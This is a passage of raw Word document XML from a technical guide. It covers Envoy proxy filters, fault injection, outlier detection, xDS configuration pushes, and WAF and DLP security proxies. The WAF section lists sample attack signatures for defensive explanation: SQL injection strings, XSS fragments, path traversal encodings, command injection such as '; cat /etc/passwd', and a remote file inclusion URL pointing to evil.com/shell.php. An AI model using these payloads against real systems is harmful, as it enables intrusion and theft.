        <w:t>tcp_proxy: Basic TCP proxying — connect to upstream, forward bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D7D11" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>http_connection_manager: Upgrades to HTTP processing (hands off to HTTP filters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3BF35" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>mongo_proxy: Understands MongoDB wire protocol — logs queries, collects metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B196A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="558"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>mysql_proxy: Understands MySQL protocol — for database-level observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEAC415" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>HTTP filters (L7):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28714BE5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>router: The terminal filter — performs the actual routing decision and upstream request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D796A2F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>ratelimit: Rate limiting (calls external RateLimit service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB4652" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>jwt_authn: Validates JWT tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF588F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>cors: Handles CORS preflight requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F932E2A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>lua: Executes custom Lua scripts for bespoke transformations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5EC5F8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>fault: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injects faults</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (delays, error responses) for chaos engineering — configured via the control plane, no code changes needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD8438" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>retry: Automatic retries with exponential backoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F266357" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="559"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker: Outlier detection and circuit breaking per upstream cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBDB1FC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fault injection filter — how chaos engineering works in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61DEEB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Envoy's fault injection filter can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1DD6D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abort requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> with a specified HTTP status code (e.g., 503) for X% of requests — simulates upstream failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31886269" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delay requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> by a specified duration for X% of requests — simulates network latency or slow upstreams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58341861" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>These are configured via the xDS API from the control plane and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>take effect immediately without restarting Envoy</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. This enables centralized chaos engineering: inject faults into specific service-to-service communication paths, watch how the system responds, remove faults — all via the control plane API with no application code changes or service restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619830F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outlier detection — passive health checking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269AFA2D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Envoy monitors actual request outcomes to upstream endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C5BA7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>consecutive_5xx: Eject a backend after N consecutive 5xx responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D4DE34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>consecutive_gateway_errors: Eject after N consecutive 502/503/504 responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5D1DC5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>success_rate_minimum_hosts: Only run outlier detection if at least N hosts in the cluster have enough request volume to be statistically meaningful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C0733" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>success_rate_stdev_factor: Eject a host if its success rate is more than K standard deviations below the cluster average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBD1A4D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ejection mechanics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Ejected endpoints are removed from the load balancing rotation for a base ejection time (e.g., 30 seconds). If the endpoint continues to fail on its periodic re-admission attempts, the ejection time doubles (up to a max). This is exponential backoff </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>at the load balancing layer — persistently failing backends are progressively excluded for longer periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6CFAB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The xDS configuration push — how control plane updates propagate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579A8D7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Envoy maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>long-lived bidirectional gRPC streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to the control plane (Istiod). Configuration is pushed over these streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F1226" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F783809" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Control Plane → EDS: "Endpoint 10.0.1.5:8080 is now healthy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A9141" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Control Plane → CDS: "Cluster payment-service now uses P2C load balancing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73383E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Control Plane → RDS: "Route /api/v2/* to cluster payment-service-v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01415CE6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Control Plane → LDS: "New listener on port 9090 for admin traffic"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439583C6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Envoy applies these updates </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atomically</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a cluster update that changes multiple parameters takes effect all at once, not partially. This is achieved via versioned configuration (each xDS update has a version nonce). Envoy acknowledges each update with the nonce — the control plane knows the update was applied. On reconnection (Envoy restart, control plane restart), the control plane re-sends the current state to resync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED20D1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="60D84346">
          <v:rect id="_x0000_i3059" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910C7B7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Security Proxy Patterns — WAF, DLP, and Anonymization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAB6DD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF) — Proxy as Security Enforcer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5E7AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is a specialized reverse proxy that inspects HTTP requests for malicious patterns and blocks attacks before they reach the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43256B7B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF detection mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9917CB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Signature-based detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Pre-defined patterns (regular expressions, byte sequences) matching known attack signatures. OWASP Core Rule Set (CRS) — the standard WAF ruleset — contains thousands of signatures for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45326C83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Patterns like ' OR '1'='1, UNION SELECT, --, /*, xp_cmdshell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79A60C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-site scripting (XSS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Patterns like &lt;script&gt;, javascript:, onerror=, onload=.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3E6A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path traversal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Patterns like ../, ..%2F, %2e%2e%2f.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13D19C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Patterns like ; cat /etc/passwd, | ls -la, `id`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D11B4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="562"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote file inclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Patterns like http://evil.com/shell.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D23E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Each request component (URI, query parameters, POST body, HTTP headers, cookies) is tested against the signature database. </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paranoia levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> control sensitivity — higher paranoia catches more attacks but increases false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D6EB9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Anomaly scoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Rather than immediately blocking on any signature match (too many false positives), WAFs accumulate an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anomaly score</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> from all partial matches. If the total score exceeds a threshold, block the request. A single suspicious character doesn't block — a combination of suspicious patterns does. This dramatically reduces false positives while catching sophisticated multi-vector attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A0E07" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Behavioral / rate-based detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Track request rates, error rates, and patterns per client. A client that sends 10,000 requests in 1 second is likely a bot/scanner. A client that probes many different URLs sequentially is likely enumeration. Rate limiting at the WAF layer stops volumetric attacks and scanning before they reach the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298DF28" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Machine learning-based detection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Train models on normal traffic patterns (request structure, parameter types, response codes). Flag requests that deviate significantly from the learned baseline. Detects </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero-day attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that don't match known signatures because they're genuinely novel — the attack pattern wasn't in the training data, but the statistical deviation from normal is detectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB5FFB5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAF false positive management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FBE75" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>False positives (legitimate requests blocked by WAF) are the operational nightmare of WAF deployment. Common causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA8A83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Legitimate rich text editors that send HTML in form fields (matches XSS signatures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11008EBF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>SQL-like parameter values in legitimate queries (product_type=ORDER BY price).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D70EFFB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="563"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>API endpoints that accept code samples as input (developers submitting code to a code review tool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B34BAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096AD703" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Allowlist specific parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that legitimately contain signature-matching content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C7332D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lower paranoia level</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for specific trusted endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03422E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log-only mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (detection mode) before enforcement mode — observe false positives before blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EA9B8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="564"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-endpoint rule exclusions</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — exclude specific WAF rules for specific URL paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C91A480" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Loss Prevention (DLP) Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A60A63C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A DLP proxy inspects </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>outbound traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for sensitive data leaving the organization — credentials, PII, financial data, intellectual property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D5F635" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pattern matching in the request body:</w:t>
      </w:r>
    </w:p>
